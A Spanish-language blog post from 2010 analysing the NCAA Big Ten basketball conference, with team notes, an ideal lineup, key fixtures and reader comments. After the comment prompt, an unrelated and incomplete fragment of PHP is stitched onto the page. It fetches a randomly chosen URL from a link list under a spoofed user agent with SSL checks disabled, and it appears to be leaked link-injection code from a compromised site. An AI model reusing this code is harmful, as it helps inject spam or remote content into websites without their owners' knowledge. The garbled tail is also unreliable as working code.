Análisis NCAA – Big Ten

20 de February de 2010 por kantonyo

La Conferencia Big Ten está compuesta por 11 universidades a pesar de su nombre, todas ellas en la periferia de los Grandes Lagos.

En esta conferencia se encuentran los finalistas de la temporada pasada, los Spartans de Michigan State. Tom Izzo, toda una institución en el baloncesto universitario, logró llevar a los Spartans a su cuarta Final Four en los últimos diez años. Su máximo exponente, el eléctrico base Kalin Lucas, optó por esperar un año más para dar el salto a la NBA. En la presente temporada, los Spartans han visto frenar su gran trayectoria a principios del mes de febrero, con tres derrotas contundentes ante Wisconsin, Illinois y Purdue, posiblemente influenciadas por la lesión de Kalin Lucas en el primero de los 3 partidos. A pesar de estos traspiés, Michigan State sigue liderando la BigTen, aunque seguido de cerca por Purdue, con los que seguramente se dispute el título de la temporada regular en su próximo enfrentamiento, el 28 de Febrero. En este momento los Spartans se sitúan en el puesto 11 del ranking de la Associated Press.

La Universidad de Purdue (Indiana) después de un último mes impecable se ha situado en el 4º puesto del ranking AP. Las ocho victorias consecutivas, la mayoría de ella contra rivales directos, han puesto a los Boilermakers a tiro para llevarse el título de la Regular Season. La principal razón de este éxito radica en que han conseguido retener a sus principales figuras. La columna vertebral del equipo está formada por su máximo anotador, el escolta E’Twaun Moore, el alero de raza blanca Robbie Hummel y el durísimo ala-pívot JaJuan Johnson. Las características de estos jugadores ofrecen a Purdue tener una de las plantillas más compensadas de toda la liga.

La última derrota contra Purdue, ha dejado a Ohio State con muy pocas posibilidades del triunfo en la season, pero de la misma forma, ha dejado buenas sensaciones para los torneos de postemporada. Los Buckeyes, campeones de la conferencia en 2007 con Greg Oden y Mike Conley, disponen de una de las sensaciones del año: Evan Turner. En su tercer año en la universidad, el escolta de 21 años, ha dado un gran salto cualitativo en su rendimiento colocándose en la mayoría de las quinielas como número 2 del próximo draft. Evan es un jugador muy completo, capaz de jugar como escolta, alero o incluso de base. Debido a su versatilidad suele promediar números cercanos al triple-doble. Actualmente promedia 19 puntos, 9 rebotes y 6 asistencias. El juego exterior de los Buckeyes está apuntalado además con William Buford, Jon Diebler y David Lighty, formando uno de los perímetros más potentes de la liga. Todo lo contrario ocurre con su juego interior, donde carece de jugadores importantes.

Dentro de las universidades que mejor lo están realizando esta temporada nos encontramos con Wisconsin. A pesar de la lesión del ala-pívot Jon Leuer, en su mejor momento, los Badgers han conseguido un balance de 19-7, situándose en el puesto 14 del ranking AP contra todo pronóstico. Lo más destacado de Wisconsin es el base Trevon Hughes y sobre todo Jason Bohannon, escolta de cuarto año, que se está convirtiendo en uno de los mejores tiradores exteriores de la conferencia.

La gran decepción de la BigTen, es Michigan Wolverines. A pesar de contar con el ala-pívot DeShawn Sims y el escolta Manny Harris, han vivido un año desastroso con un balance de 13-12, que les puede dejar incluso fuera del March Madness. A pesar de ello, tanto Sims como Harris siguen contando para la segunda ronda del draft de 2010.

En las universidades no aspirantes, destacamos el progreso del sophomore John Shurna, ala-pívot de Northwestern y el escolta de primer año Maurice Creek, aunque este último se lesionó para el resto de la temporada.


Quinteto Ideal

PF – JaJuan Johnson (Purdue)
SF – Robbie Hummel (Purdue)
SF – Evan Turner (Ohio State)
SG – Jason Bohannon (Wisconsin)
PG – Kalin Lucas (Michigan St)

Otros jugadores a seguir

– Centers: Mike Tisdale (Illinois), Ralph Sampson III (Minnesota)

– Forwards: DeShawn Sims (Michigan), Mike Davis (Illinois), John Shurna (Northwestern), Raymar Morgan (Michigan St), Draymon Green (Michigan St).

– Guards: Durrell Summers (Michigan St), Manny Harris (Michigan), David Lighty (Ohio St), William Buford (Ohio St), Jon Diebler (Ohio St), Trevon Hughes (Wisconsin), E’Twaun Moore (Purdue)

Próximos partidos clave

20 Febrero: Illinois – Purdue
21 Febrero: Ohio State – Michigan St
28 Febrero: Michigan St- Purdue
3 Marzo: Illinois – Ohio State
6 Marzo: Wisconsin – Illinois

Comenta

5 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Lo de los Sprartans el año pasado tuvo mucho mérito, pero ninguno de sus jugadores me dio la impresión de poder hacer una gran carrera en la NBA.

    He leido cosas muy buenas de Turner, del resto se muy poco.

      Citar

  2. Dantley2 dice:
    #2

    Me encanta Turner, lo habré visto no más de 50 o 60 minutos, pero es de esos que lo ves y piensas que ahí hay un jugador de baloncesto. Casi todos los años hay algún jugador exterior capaz de hacer un poco de todo tipo Roy o Harden. En el caso de Harden y en el de Turner la duda es si su físico es NBA, pero es muy bueno.

    Está John Wall que a día de hoy sería casi sacrilegio no decantarse por él, pero me iría a por Turner con los ojos cerrados. Si será un Roy o se quedará en un Battier lo dirá el tiempo

      Citar

  3. kantonyo dice:
    #3

    Estoy contigo Viva_Dirk en que los Spartans no disponen de grandes jugadores para los buenos resultados que están teniendo, pero la labor de su entrenador y la historia que hay detrás de este equipo tienen mucho peso.

    Kalin Lucas es el típico jugador que sin grandes recursos, puede aportar en la NBA desde el principio dado su caracter, visión de juego y entrega. Al estilo de Ty Lawson este año. Posiblemente le veamos en primera ronda del draft.

    El año pasado contaban con el pívot Goran Suton, que fue elegido en segunda ronda del draft, pero ha tenido que probar suerte en Rusia.

    La elección del primer puesto del draft dependerá este año del equipo que tenga que elegir, no creo que Minnesota por ejemplo vuelva a elegir un base, y creo que le vendría mejor un jugador como Turner, a no ser que eligan pensando en traspasos. New Jersey con Harris o Warriors con Curry, tampoco tienen pinta de buscar un base.

      Citar

  4. Viva_Dirk dice:
    #4

    Si, Lucas es el que mas pinta de jugador NBA tiene, pero claro a mi Ty Lawson me parece mucho mas jugador.

      Citar

  5. kantonyo dice:
    #5

    Hace unos dias Robbie Hummel se lesionó de gravedad, y le hará perderse posiblemente el March Madness y lo que resta de temporada. Una pena, estaba en un nivel enorme. Sin Hummel, Purdue pierde un valor importante, y deja de ser favorito al titulo NCAA. Ayer perdió contra Michigan State, anotando sólo 44 puntos, su peor anotación de la temporada.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>